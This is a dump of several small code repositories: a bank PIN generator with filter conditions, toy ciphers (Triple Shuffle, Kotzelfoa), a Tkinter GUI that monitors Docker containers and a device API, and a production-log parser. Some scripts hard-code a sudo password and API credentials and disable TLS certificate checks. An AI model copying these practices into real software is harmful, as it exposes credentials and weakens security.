More\n definitions for custom conditions can be added to this file.\n- `customer.py` - defines the basic `Customer` construct which contains information which may be used in conditions.\n\nThis project has been designed with modularity and usability in mind in order to simplify the addition of new\n`Condition` classes.\n\nThe generator has been designed so that valid lists of pins \"cascade\" through the layers of conditions. It is the\nblueprint by which any numbers of conditions can be used since all conditions must satisfy the\n`Condition` interface - thus ensuring they have the correct methods.\n\nThis ensures that there is sufficient modularity that different conditions can be used at different times, without\naffecting the rest of the code. This means that any security auditing only has to be done on the added code of the\ncondition rather than checking the whole application. After a condition has been designed and implemented, one\nonly has to add it to the generator using the `add_cond()` method, and the run code for the generator can remain\nunchanged.\n\nFor example, if I wanted to add a condition which ensures that the pin cannot start with a \"0\", all I would have to do\nis define the code for the condition as a class which implements the `Condition` interface and add it to\n`condition.py`, like this:\n\n```python\n# condition.py\n\nclass First0Digit(Condition):\n def filter(self, pins, *args) -> list:\n satisfied = []\n\n for p in pins:\n if p[0] != \"0\":\n satisfied.append(p)\n return satisfied\n```\n\nThen I would go to `main.py` and add a constructed condition to the generator with\n```python\n# main.py\n\ngen.add_cond(First0Digit())\n```\nin the section which is clearly labeled as the place to add this code.\n\nThere! 
That was easy!\n" }, { "alpha_fraction": 0.5611038208007812, "alphanum_fraction": 0.5755584836006165, "avg_line_length": 25.241378784179688, "blob_id": "a0a0d040b84c0aa4815509dcd3a3fbb82f97e0c2", "content_id": "1feec8670b69aa1ed5c30db87e18b99d8977c11a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 761, "license_type": "no_license", "max_line_length": 70, "num_lines": 29, "path": "/gen.py", "repo_name": "rhobro/qb-pin-gen", "src_encoding": "UTF-8", "text": "import random as rd\n\nfrom condition import Condition\nfrom customer import Customer\n\ndigits = [str(n) for n in range(10)]\n\n\nclass Generator:\n def __init__(self):\n self.conditions = []\n\n def add_cond(self, cond: Condition):\n self.conditions.append(cond)\n\n def gen(self, customer: Customer) -> str:\n # generate all combos\n combos = []\n for dig0 in digits:\n for dig1 in digits:\n for dig2 in digits:\n for dig3 in digits:\n combos.append(dig0 + dig1 + dig2 + dig3)\n\n # filter for each condition\n for c in self.conditions:\n combos = c.filter(combos, customer)\n\n return combos[rd.randint(0, len(combos))] # return random pin\n" }, { "alpha_fraction": 0.558486819267273, "alphanum_fraction": 0.5848680734634399, "avg_line_length": 23.80246925354004, "blob_id": "8289f495493115a2bdf4a5215bc439ac0e86adf6", "content_id": "f1f9a06ab04115517e85140eda717cc9095f1bb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2010, "license_type": "no_license", "max_line_length": 84, "num_lines": 81, "path": "/condition.py", "repo_name": "rhobro/qb-pin-gen", "src_encoding": "UTF-8", "text": "# Copyright © 2021 NeuroByte Tech. 
All rights reserved.\n#\n# NeuroByte Tech is the Developer Company of Rohan Mathew.\n#\n# Project: qbPinGenerator\n# File Name: condition.py\n# Last Modified: 20/01/2021, 22:00\n#\n# NeuroByte Tech is the Developer Company of Rohan Mathew.\n#\n# Project: qbPinGenerator\n# File Name: condition.py\n# Last Modified: 20/01/2021, 21:54\n#\n# NeuroByte Tech is the Developer Company of Rohan Mathew.\n#\n# Project: qbPinGenerator\n# File Name: condition.py\n# Last Modified: 20/01/2021, 21:18\n\n\nclass Condition:\n \"\"\"interface for conditions\"\"\"\n\n def filter(self, pins, *args) -> list:\n \"\"\"\n :param pins is a list of 4-digit strings of pins\n :return list of pins from the parameters which satisfy the defined condition\n \"\"\"\n return pins\n\n\nclass MoreThan2Consec(Condition):\n def filter(self, pins, *args) -> list:\n satisfied = []\n\n for p in pins:\n valid = True\n\n for j, c in enumerate(p[:-2]):\n if c == p[j + 1] == p[j + 2]:\n valid = False\n break\n\n if valid:\n satisfied.append(p)\n\n return satisfied\n\n\ndigits = [str(n) for n in range(10)]\nconsec_seqs = []\nfor i in range(len(digits) - 3):\n consec_seqs.append(\"\".join(digits[i: i + 4]))\n\n\nclass ConsecSeq(Condition):\n def filter(self, pins, *args) -> list:\n satisfied = []\n for p in pins:\n if p not in consec_seqs:\n satisfied.append(p)\n return satisfied\n\n\nclass PrevPins(Condition):\n def __init__(self, depth):\n self.d = depth\n\n def filter(self, pins, *args) -> list:\n return [p for p in pins if p not in args[0].past_pins[-1 * self.d:]]\n\n\nclass InAccNum(Condition):\n def filter(self, pins, *args) -> list:\n return [p for p in pins if p not in args[0].acc]\n\n\nclass InSortCode(Condition):\n def filter(self, pins, *args) -> list:\n return [p for p in pins if p not in args[0].sort.replace(\"-\", \"\")]\n" } ]
6
YaF3li/ciphers
https://github.com/YaF3li/ciphers
b03b9cdeefc315140d9b4a50923b13efa3b3f809
b3940b6b5d1b01cce2937f6033120daffd54bddd
c1c1ffe46a523adf0482cb9495f53dd8668a4461
refs/heads/master
2021-07-17T08:55:43.921433
2020-09-04T19:15:45
2020-09-04T19:15:45
206,738,805
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6247464418411255, "alphanum_fraction": 0.6369168162345886, "avg_line_length": 19.58333396911621, "blob_id": "81036a979bbc7f083599aab30c71684951e3e40e", "content_id": "6f1f876b5b5442736f0cd3eeba1b6b7333bc3e6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 493, "license_type": "no_license", "max_line_length": 58, "num_lines": 24, "path": "/TripleShuffle/run.py", "repo_name": "YaF3li/ciphers", "src_encoding": "UTF-8", "text": "import sys\nfrom TripleShuffle import Cipher\n\nif len(sys.argv) < 5:\n print(\"Arguments: <enc|dec> <indexA> <indexB> <text>\")\n sys.exit(1)\n\nmode = sys.argv[1]\nindexA = sys.argv[2]\nindexB = sys.argv[3]\ntext = sys.argv[4]\n\noutput = \"-\"\ntry:\n cipher = Cipher(indexA, indexB)\n if mode == \"enc\":\n output = cipher.encipher(text)\n elif mode == \"dec\":\n output = cipher.decipher(text)\nexcept:\n print(\"Sorry, error occured. Check your arguments.\")\n\nprint(text)\nprint(output)" }, { "alpha_fraction": 0.747863233089447, "alphanum_fraction": 0.7606837749481201, "avg_line_length": 28.25, "blob_id": "b54f1d35fad8f47c48d043abdadb3f31d324e79e", "content_id": "e35866dd51fcbe7dbd9493f96748ae820177fb33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 234, "license_type": "no_license", "max_line_length": 95, "num_lines": 8, "path": "/Kotzelfoa/README.md", "repo_name": "YaF3li/ciphers", "src_encoding": "UTF-8", "text": "# Kotzelfoa speakable code language\nCreated by Garrett Warren\n\nSee https://www.reddit.com/r/codes/comments/i4lv1j/a_speakable_and_writable_code_i_made_called/\n\nPython 3 implementation by me\n\nCall: python Kotzelfoa/run.py \\<enc|dec> \"\\<text>\"\n" }, { "alpha_fraction": 0.4801619350910187, "alphanum_fraction": 0.4955465495586395, "avg_line_length": 26.455554962158203, "blob_id": "dff773c6544d1075d767a9ceddf049e2c242b197", "content_id": 
"28c760896e3578ed31d87fd820b0d20dd8c6e4a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2470, "license_type": "no_license", "max_line_length": 66, "num_lines": 90, "path": "/TripleShuffle/__init__.py", "repo_name": "YaF3li/ciphers", "src_encoding": "UTF-8", "text": "# \"Triple Shuffle Cipher\"\n# Developed by YaF3li\n\nclass Cipher:\n def __init__(self, indexA, indexB):\n self.alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n if self.check_index(indexA) != 1:\n raise Exception()\n if self.check_index(indexB) != 1:\n raise Exception()\n \n self.initialA = indexA\n self.initialB = indexB\n self.reset()\n\n def check_index(self, index):\n if len(index) != len(self.alphabet):\n return 0\n for c in index:\n if self.alphabet.find(c) < 0:\n return 0\n return 1\n\n def encipher(self, input):\n self.reset()\n \n output = []\n lastIndex = 0\n for c in input:\n index = ord(c) - 65\n if index >= 0 and index <= 25:\n self.shuffle(lastIndex)\n c = self.alphabet[self.get_wiring(index)]\n output.append(c)\n lastIndex = index\n return \"\".join(output)\n \n def decipher(self, input):\n self.reset()\n \n output = []\n lastIndex = 0\n for c in input:\n index = ord(c) - 65\n if index >= 0 and index <= 25:\n self.shuffle(lastIndex)\n index = self.get_wiring_reverse(index)\n output.append(self.alphabet[index])\n lastIndex = index\n return \"\".join(output)\n\n def get_wiring(self, index):\n c = self.indexA[index]\n return self.indexB.find(c)\n\n def get_wiring_reverse(self, index):\n c = self.indexB[index]\n return self.indexA.find(c)\n\n def shuffle(self, additive):\n if self.swapShuffle != 0:\n splice = self.indexB\n move = self.indexA\n else:\n splice = self.indexA\n move = self.indexB\n \n # Splice 1\n splice = splice[13:] + splice[:13]\n \n # Splice 2\n index = (7 + additive) % 26\n splice = splice[index] + splice[:index] + splice[index+1:]\n \n # Move\n move = move[18:] + move[:18]\n \n if self.swapShuffle != 0:\n self.indexB 
= splice\n self.indexA = move\n else:\n self.indexA = splice\n self.indexB = move\n \n self.swapShuffle = (self.swapShuffle + 1) % 2\n\n def reset(self):\n self.indexA = self.initialA\n self.indexB = self.initialB\n self.swapShuffle = 0" }, { "alpha_fraction": 0.7235772609710693, "alphanum_fraction": 0.7317073345184326, "avg_line_length": 40, "blob_id": "aca540fe6f857a2c15620c953eaed84ef1fccdb7", "content_id": "5effd46f1f495d3e79c538474265759c78978ee1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 123, "license_type": "no_license", "max_line_length": 72, "num_lines": 3, "path": "/TripleShuffle/README.md", "repo_name": "YaF3li/ciphers", "src_encoding": "UTF-8", "text": "# Triple Shuffle cipher\nPython 3 implementation \nCall: python TripleShuffle/run.py \\<enc|dec> \\<indexA> \\<indexB> \\<text>\n" }, { "alpha_fraction": 0.7538461685180664, "alphanum_fraction": 0.7538461685180664, "avg_line_length": 31.5, "blob_id": "9ef7c7254b04deb6f1ef2abac4a8affaf6436720", "content_id": "f16fd7c0ef8181773633ba71a2de1a639f9a9321", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 65, "license_type": "no_license", "max_line_length": 54, "num_lines": 2, "path": "/README.md", "repo_name": "YaF3li/ciphers", "src_encoding": "UTF-8", "text": "# Ciphers\nDo not use for actual crypto, this is a hobby project!\n" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.6354166865348816, "avg_line_length": 16.5, "blob_id": "7140798cbc72bc1f5070227f30fb84aa7f78c479", "content_id": "85b465ff862dce75197f2123b8b553c2692777ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 384, "license_type": "no_license", "max_line_length": 57, "num_lines": 22, "path": "/Kotzelfoa/run.py", "repo_name": "YaF3li/ciphers", "src_encoding": "UTF-8", "text": "import sys\nfrom Kotzelfoa import Code\n\nif len(sys.argv) < 2:\n print(\"Arguments: 
<enc|dec> <text>\")\n sys.exit(1)\n\nmode = sys.argv[1]\ntext = sys.argv[2]\n\noutput = \"-\"\n#try:\ncode = Code()\nif mode == \"enc\":\n output = code.encode(text)\nelif mode == \"dec\":\n output = code.decode(text)\n#except:\n# print(\"Sorry, error occured. Check your arguments.\")\n\nprint(text)\nprint(output)" }, { "alpha_fraction": 0.42136043310165405, "alphanum_fraction": 0.43090182542800903, "avg_line_length": 37.69047546386719, "blob_id": "d5d0deafa2c7c67c58d7c27b4f11abf03fa79d33", "content_id": "a89bbaa2dec365332a4040940a2607378465b49e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3249, "license_type": "no_license", "max_line_length": 179, "num_lines": 84, "path": "/Kotzelfoa/__init__.py", "repo_name": "YaF3li/ciphers", "src_encoding": "UTF-8", "text": "# \"Kotzelfoa\"\n# by Garrett Warren\n# Program by YaF3li\n\nclass Code:\n def __init__(self):\n self.alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n self.vowels = \"AEIOU\"\n self.vowel_separator = 't'\n self.single_letter_indicator = 'p'\n self.codeA = [\"z\", \"sm\", \"sp\", \"g\", \"f\", \"v\", \"sh\", \"l\", \"sk\", \"b\", \"ch\", \"shk\", \"d\", \"jh\", \"j\", \"s\", \"sf\", \"tz\", \"st\", \"r\", \"h\", \"shl\", \"k\", \"th\", \"fl\", \"shp\"]\n self.codeB = [\"o\", \"ain\", \"oi\", \"an\", \"i\", \"ai\", \"am\", \"ia\", \"u\", \"om\", \"oin\", \"on\", \"oe\", \"oa\", \"a\", \"em\", \"oan\", \"en\", \"in\", \"im\", \"e\", \"ian\", \"oam\", \"oen\", \"iam\", \"un\"]\n self.codes = [self.codeA, self.codeB]\n\n def next_token(self, input, position, code):\n token = input[position : position + 3]\n while not (token in code):\n token = token[0 : len(token) - 1]\n if len(token) <= 0:\n return \"\", position + 1\n return token, position + len(token)\n \n def encode(self, input):\n input = input.upper()\n \n output = \"\"\n for word in input.split():\n if len(word) <= 0:\n continue\n if len(word) <= 1:\n charIdx = self.alphabet.find(word[0])\n if 
charIdx >= 0:\n output += self.single_letter_indicator + self.codeB[charIdx] + \" \"\n continue\n bigrams = [[]]\n for c in word:\n charIdx = self.alphabet.find(c)\n if charIdx >= 0:\n idx = len(bigrams) - 1\n if len(bigrams[idx]) >= 2:\n bigrams.append([])\n idx += 1\n bigrams[idx].append(charIdx)\n \n for bigram in bigrams:\n if len(bigram) < 2:\n lastChar = output[len(output) - 1].upper()\n if self.vowels.find(lastChar) >= 0:\n output += self.vowel_separator\n output += self.codeB[bigram[0]]\n else:\n output += self.codeA[bigram[0]]\n output += self.codeB[bigram[1]]\n output += \" \"\n return output\n \n def decode(self, input):\n input = input.lower()\n \n output = \"\"\n for word in input.split():\n if len(word) <= 0:\n continue\n if len(word) <= 2 and word[0] == self.single_letter_indicator:\n if word[1] in self.codeB:\n idx = self.codeB.index(word[1])\n output += self.alphabet[idx]\n output += \" \"\n continue\n \n position = 0\n code = 0\n while position < len(word):\n lastPosition = position\n token, position = self.next_token(word, position, self.codes[code])\n if position >= len(word):\n code = 1\n token, position = self.next_token(word, lastPosition, self.codes[code])\n if len(token) > 0:\n idx = self.codes[code].index(token)\n output += self.alphabet[idx]\n code = (code + 1) % 2\n output += \" \"\n return output" } ]
7
kuangrp/upload
https://github.com/kuangrp/upload
3fff7a04ce3ab337871ffcac49017c9a4799163b
371bdf366c58014e8ffa7bbec9a4024f13e21415
941b0533d0720370578c3e00ea75983abf8a5236
refs/heads/master
2020-04-02T23:02:23.873519
2018-11-26T10:42:52
2018-11-26T10:42:52
154,853,654
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5772811770439148, "alphanum_fraction": 0.5791434049606323, "avg_line_length": 21.25, "blob_id": "39d156489bb98e301f014ee2a26e78d01c2571c8", "content_id": "f3a54adb7d9ee101b4f5508316ec3727dd665e85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 537, "license_type": "no_license", "max_line_length": 78, "num_lines": 24, "path": "/rename.py", "repo_name": "kuangrp/upload", "src_encoding": "UTF-8", "text": "import os,time\ndisk = os.getcwd()\ndef wirte_txt():\n\tprint ('run')\n\tnum = [a+'/'+n for a,b,c in os.walk(disk) for n in c]\n\tprint (len(num))\n\t#with open(disk+'name.txt','a') as f:\n\t#\tfor i in num:\n\t#\t\tf.write(i+'\\n')\n\treturn num\ndef main(num):\n\tchuan = list(set([a+'/'+n for a,b,c in os.walk(disk) for n in c]) - set(num))\n\tif chuan:\n\t\tfor i in chuan:\n\t\t\tprint ('rename --'+i)\n\t\t\trena = i.replace('.','x')\n\t\t\tos.rename(i,rena)\n\t\t\tnum.append(rena)\n\telse:\n\t\tprint ('no updata!')\ntxt = wirte_txt()\nwhile True:\n\tmain(txt)\n\ttime.sleep(3)\n\n\n\n" }, { "alpha_fraction": 0.875, "alphanum_fraction": 0.875, "avg_line_length": 23, "blob_id": "5c751f6b444136587f19c4a4df0a15871ee662bd", "content_id": "68f1f5cb0b6555142e1f9a47b32ac7451d2f0843", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 126, "license_type": "no_license", "max_line_length": 24, "num_lines": 2, "path": "/README.md", "repo_name": "kuangrp/upload", "src_encoding": "UTF-8", "text": "# 主要用于AWD线下赛中监测对手的文件上传行为\n具体就是检测到上传文件后,将文件名的.替换掉\n" } ]
2
Sagarved/gui-tkinter-poprn-yml
https://github.com/Sagarved/gui-tkinter-poprn-yml
f742c79e0c867d37469fdf58e507f2ccf9a0b17e
dfc81363d687e0389cde6e568f8f42ebaf104c1c
6f74a6ca50125a097e10ab5ed83912fb404bf3eb
refs/heads/master
2023-08-13T13:54:09.856209
2021-10-05T23:21:33
2021-10-05T23:21:33
414,006,525
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6039286255836487, "alphanum_fraction": 0.6416115164756775, "avg_line_length": 35.40876007080078, "blob_id": "530ce13941dd5741ba60734fa8e6718ea492ba3f", "content_id": "39a43c9f9a2514fb3ac5b2237fbd49ffd9b0c3ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4989, "license_type": "no_license", "max_line_length": 157, "num_lines": 137, "path": "/center_gui.py", "repo_name": "Sagarved/gui-tkinter-poprn-yml", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\nimport logging\nimport time\nfrom tkinter import *\n\nimport start_container as sc\nimport device_api as dev\n\nlogging.info('Welcome to LoRa In A Box')\nroot = Tk()\nroot.title(\"Welcome to LoRa In A Box\") \nroot.geometry(\"1920x1080\")\nroot.configure(background='black')\ncount_num = 0\n\nfont_creator = ('Helvetica', 25,'bold')\n#gridFrame = Frame(root, bg='black')\n\nstep_text = {\"step_1\": \"System Up\", \"step_2\": \"LNS Up\", \"step_3\": \"Dashboard\", \"step\": \"Device Connected\"}\n#Creating label for four steps\nstep_1 = Label(root, text=\"System Up\", bg='yellow', padx=10, pady=10, font=font_creator, height=3, relief= RAISED)\nstep_2 = Label(root, text=\"LNS Up\", bg='yellow', padx=10, pady=10, font=font_creator, height=3, relief= RAISED)\nstep_3 = Label(root, text=\"LoRa Dashboard\", bg='yellow', padx=10, font=font_creator, pady=10, height=3, relief= RAISED)\nstep_4 = Label(root, text=\"Devices Connected\", bg='yellow', padx=10, font=font_creator, pady=10, height=3, relief= RAISED)\n\n#Data flow Arrow\nwhite_image = PhotoImage(file='/home/wrdlab/white.gif')\ngreen_image = PhotoImage(file='/home/wrdlab/green.gif')\n#python_gif_image = PhotoImage(file='/home/wrdlab/gifarrow.gif')\nst12_label = Label(root, image=white_image)\nst23_label = Label(root, image=white_image)\nst34_label = Label(root, image=white_image)\n\n#Arrow positioning row=1\n#Even column\nst12_label.grid(row=1, column=2)\nst23_label.grid(row=1, 
column=4)\nst34_label.grid(row=1, column=6)\n\n#Vertical position of data stores in Row 1 and odd column\nstep_1.grid(row=1,column=1)\nstep_2.grid(row=1,column=3)\nstep_3.grid(row=1,column=5)\nstep_4.grid(row=1,column=7)\n\n#Central object placement using equal weight to row 1,2, and 3\nroot.rowconfigure(0,weight=1) \nroot.rowconfigure(1,weight=1) \nroot.rowconfigure(2,weight=1) \n\n#Central horizontal placement with the same weightage on all column\n#If new steps are added add in column space\nroot.columnconfigure(1,weight=2) \nroot.columnconfigure(3,weight=2) \nroot.columnconfigure(5,weight=2) \nroot.columnconfigure(7,weight=2)\n#Data flow image dynamic width\nroot.columnconfigure(2,weight=1) \nroot.columnconfigure(4,weight=1) \nroot.columnconfigure(6,weight=1) \n\n#color annotation\nready = Label(root, text=\"Ready\", bg='green', padx=25, pady=10).grid(row=9,column=0)\nprogress = Label(root, text=\"In Progress\", bg='#5f0fff',padx=10, pady= 10).grid(row=10,column=0)#light blue #5f0fff\npending = Label(root, text=\"Not_Ready\", bg='yellow', padx=10, pady=10).grid(row=11,column=0)\n\ndef status_check():\n global count_num\n check_dockers = sc.step_2()\n #print(check_dockers)\n if count_num <4:\n step_check=['3000', 'recovserver', 'starting','200'] # 3000 and starting for step1 and step2, third starting is actually healthy, 200 is api response\n step_list = [step_1,step_2,step_3,step_4]\n data_list = [st12_label,st23_label,st34_label]\n if step_check[count_num] in check_dockers and count_num < 2: \n print(step_check[count_num])\n #Change color and data flow image\n step_list[count_num].configure(bg='green')\n count_num += 1\n step_list[count_num].configure(bg='#5f0fff')\n if count_num > 1:\n data_list[count_num-2].configure(image=green_image)\n elif step_check[count_num] not in check_dockers and count_num==2:\n print(step_check[count_num])\n #Change color and data flow image\n step_list[count_num].configure(bg='green')\n count_num += 1\n 
step_list[count_num].configure(bg='#5f0fff')\n if count_num > 1:\n data_list[count_num-2].configure(image=green_image)\n elif count_num ==3:\n resp = dev.dev_api()\n #print(resp,devices)\n\n if '200' in str(resp):\n #Number of devices\n devices = resp[1]\n print(step_check[count_num])\n #Change color and data flow image\n step_list[count_num].configure(text= str(devices)+ ' Devices Connected',bg='green')\n count_num += 1\n if count_num > 1:\n data_list[count_num-2].configure(image=green_image)\n \n root.after(3000, status_check)\n \n \n \n\n\ndef ready_check():\n #check if system is ready with both container status Healthy\n check = False\n check = sc.step_2()\n print(check)\n if check:\n ready.configure(text= 'System Ready', bg='green', padx=20, pady=20)\n else:\n ready.configure(text='System not ready, wait for sometime')\n\n\"\"\"def basic():\n global count_num\n if count_num > 0:\n step_1.configure(bg='green')\n count_num = 0\n elif count_num == 0:\n step_1.configure(bg='red')\n count_num += 1 \n #After 2 second update status color\n root.after(2000, basic)\n\"\"\"\nif __name__==\"__main__\":\n #After 1 millisecond call basic\n\n root.after(1, status_check)\n root.mainloop()\n\n" }, { "alpha_fraction": 0.6957894563674927, "alphanum_fraction": 0.7052631378173828, "avg_line_length": 25.38888931274414, "blob_id": "f8bcb1388f3c4246911f1ee487683fec37a7dd86", "content_id": "ad601d4ff8368a2e261f9392f7bd473cce6cf671", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 950, "license_type": "no_license", "max_line_length": 89, "num_lines": 36, "path": "/device_api.py", "repo_name": "Sagarved/gui-tkinter-poprn-yml", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\"\"\"\nQuery device api and return status code with number of devices \n\"\"\"\n\nimport json\nimport yaml\nimport requests\nfrom requests.packages import urllib3\nfrom requests.auth import 
HTTPBasicAuth\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n#Reading configuration\nfile = 'config.yml'\ndata = yaml.safe_load(open(file))\ndata_api = data['api']\n\nIP = data_api['IP']\nurl = 'https://'+ IP +':50001/rest/nodes/'\nuserid= data_api['userid']\npassword= data_api['password']\n\ndef dev_api():\n #resp= requests.get(url, auth =HTTPBasicAuth('device_api','Charter123'),verify=False)\n resp= requests.get(url, auth =HTTPBasicAuth(userid, password),verify=False)\n #Convert response to the list of dictionary\n info = resp.json()\n #length of output = Number of devices\n devices = (len(info))\n #print(type(info),info)\n return(resp.status_code, devices)\n\nif __name__=='__main__':\n out = dev_api()\n print(out)\n" }, { "alpha_fraction": 0.5216701626777649, "alphanum_fraction": 0.5454545617103577, "avg_line_length": 32.78571319580078, "blob_id": "046388841660eca1db7ddf972ed3d042af195879", "content_id": "e26cb52e182d25a41fe42474e1217b31aa93f430", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1892, "license_type": "no_license", "max_line_length": 97, "num_lines": 56, "path": "/start_container.py", "repo_name": "Sagarved/gui-tkinter-poprn-yml", "src_encoding": "UTF-8", "text": "import subprocess as sp\nimport time\n\ndef step_1():\n # Starting docker and VM services\n response=sp.run(\"echo 'Charter123'|sudo service docker restart\", shell=True)\n wait = True\n while(wait):\n if response:\n wait = response.returncode\n print('Inside wait',wait)\n else:\n print('Waiting 10 secs')\n time.sleep(10)\n time.sleep(65)\n # Tuple not able to perform 'in' operation so, typecasted to string\n dls = str(sp.getstatusoutput([\"echo 'Charter123'| sudo docker container ls\"]))\n if '3000/tcp' not in dls:\n print('Not all containers have started')\n print(type(dls),dls)\n step_1()\n print('Containers are running properly')\n \ndef step_1a():\n time.sleep(20)\n vm = sp.Popen(\"sudo 
./install_startup_service_for_vm.sh\", shell=True)\n print('VM service')\n vm.wait()\n print(\"Completed step 1 and 1a\")\n\n\ndef step_2():\n all_container = False\n #check container and service\n services = sp.check_output([\"echo 'Charter123'|sudo docker service ls\"], shell=True)\n #container = sp.run([\"echo 'Charter123'| sudo docker container ls\"], shell=True)\n #Working solution\n #container = sp.check_output([\"echo 'Charter123'| sudo docker container ls\"], shell=True)\n container = str(sp.getstatusoutput([\"echo 'Charter123'| sudo docker container ls\"]))\n return container\n \"\"\"#GUI Readiness check\n if 'starting' in container:\n return False\n else:\n return True #print('Completed step 2')\n \"\"\"\n\nif __name__==\"__main__\":\n step_1()\n step_1a()\n i = 0\n while(i < 2):\n time.sleep(10)\n step_2()\n i += 1\n print('Done')\n" }, { "alpha_fraction": 0.7600896954536438, "alphanum_fraction": 0.7679372429847717, "avg_line_length": 45.05263137817383, "blob_id": "ee327421837c332fbb5b1d29e0b84dace8a8768b", "content_id": "5d43c1c325309afd778aa75a3b491136c9396d01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 892, "license_type": "no_license", "max_line_length": 120, "num_lines": 19, "path": "/README.txt", "repo_name": "Sagarved/gui-tkinter-poprn-yml", "src_encoding": "UTF-8", "text": "GUI README\r\nClone GUI repository and add to Home directory.\r\nstart_container file start and monitor container and dashboard process\r\ndevice_api file used for querying api request to find devices connected to dashboard.\r\ncenter_gui file is main file for rendering gui.\r\n\r\nconfig file comprises of dashboard url and credential for orbiwise portal\r\nSteps:\r\n1a) pip install -r requirement.txt\r\n1b) Update url, and credential in config.yml file\r\n1) start container on boot time.\r\n$ sudo vim ctontab -e\r\n-> Enter start_container script in cronjob \r\n@reboot python3 /home/wrdlab/GUI/start_container.py >> 
/home/wrdlab/GUI/sc.txt\r\n-> Save and close the file\r\n2) Start GUI on user Log In.\r\n-> On centos 7 use 'gnome-session-properties' to edit this in the GUI. Go to terminal and type $gnome-session-properties\r\n-> Add a center_gui script\r\n3) Reboot the system to check system GUI is coming properly." } ]
4
TrevorHeyl/PyProd
https://github.com/TrevorHeyl/PyProd
069b47ea8b415a37dd29281c6c78392eff8b8f80
a5f684ee5200ff366ba7aa2d89a1bfdddb47730d
d4c066d4ad7654d45470791bd3dda363810b81d2
refs/heads/master
2020-08-16T08:10:37.375224
2019-10-16T11:34:56
2019-10-16T11:34:56
215,478,278
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7368420958518982, "alphanum_fraction": 0.7368420958518982, "avg_line_length": 25.125, "blob_id": "ca874d385096e8b0749946e921d235128713646b", "content_id": "434097cca9d5a0d8ea32439bf914891bc7e3e949", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 209, "license_type": "permissive", "max_line_length": 62, "num_lines": 8, "path": "/README.md", "repo_name": "TrevorHeyl/PyProd", "src_encoding": "UTF-8", "text": "# PyProd\nPython utility to parse production logs and measure effeciency\n\nUses pandas to write the csv file\n\n**usage : >python parse.py -dYYYY/MM/DD**\n\nFiles of type CY******.txt must be in the current folder\n" }, { "alpha_fraction": 0.558795154094696, "alphanum_fraction": 0.574698805809021, "avg_line_length": 36.387386322021484, "blob_id": "220c196999f5ac103bdb77da9b94c93efbd601a7", "content_id": "00962cd04dc357ad3281ab3069f693de7cf6ca7d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4150, "license_type": "permissive", "max_line_length": 118, "num_lines": 111, "path": "/parse.py", "repo_name": "TrevorHeyl/PyProd", "src_encoding": "UTF-8", "text": "# Utility to process production logs.\n# Counts number of passes and failures and also\n# the total test time for each unit and for the batch based on the date\n# that is passed to the command line in format YYYY/MM/DD\n# The code is a demonstrator in that it can be modified to process any type of production log that\n# consists of text files that need to be read and parsed\n\nimport sys\nimport os\nimport pandas as pd\n\n\ntestdate = \"\"\nunitcount = 0\nalltesttime = 0\nalltestcount = 0\nallfailcount = 0\nallpasscount = 0\npasstesttime = 0\nfailtesttime = 0\nallpasstesttime = 0\nallfailtesttime = 0\n#print(sys.argv)\n\n#get the date parameter\nfor l in sys.argv:\n if '-d' in l:\n testdate = l[2:]\n\nif testdate == \"\":\n print(\"Please specify a date 
parameter eg >parse -d2019/10/15\")\n exit(0)\n\n\nprint(\"Test Date:\",testdate)\n# Column names\nlabels = [\"SERIAL\",\"FAIL\",\"PASS\",\"TOTALTESTS\",\"TOTALTIME\"]\ndf = pd.DataFrame(columns=labels)\n\n# for each file in the current directory ....\nfor filename in os.listdir(os.getcwd()):\n # only CY...txt files\n if \"txt\" in filename and filename[:2] == \"CY\":\n file = open(filename,'r')\n #print(filename[:-4], end=' ')\n\n lines = file.readlines()\n failcount = 0;\n passcount = 0;\n passtesttime = 0\n failtesttime = 0\n ldate = \"\"\n ltime = \"\"\n TotalTestTime = 0\n unitcount = unitcount + 1\n for i in range(0, len(lines)):\n l = lines[i]\n if \"FAIL FAIL FAIL\" in l:\n ltime = lines[i+2]\n ldate = lines[i+5]\n i = i+5\n if \"Terminal Debug Version\" in ldate:\n s = ldate.split(' ')\n if s[6] == testdate:\n #print(s[6])\n if \"Test Time\" in ltime:\n s = ltime.split(' ')\n #print(\"FAIL:\",s[4])\n TotalTestTime = TotalTestTime + int(s[4])\n failcount = failcount + 1;\n failtesttime = failtesttime + int(s[4])\n\n\n if \"PASS PASS PASS\" in l:\n ltime = lines[i+2]\n ldate = lines[i+5]\n i = i+5\n if \"Terminal Debug Version\" in ldate:\n s = ldate.split(' ')\n if s[6] == testdate:\n #print(s[6])\n if \"Test Time\" in ltime:\n s = ltime.split(' ')\n #print(\"PASS:\",s[4])\n 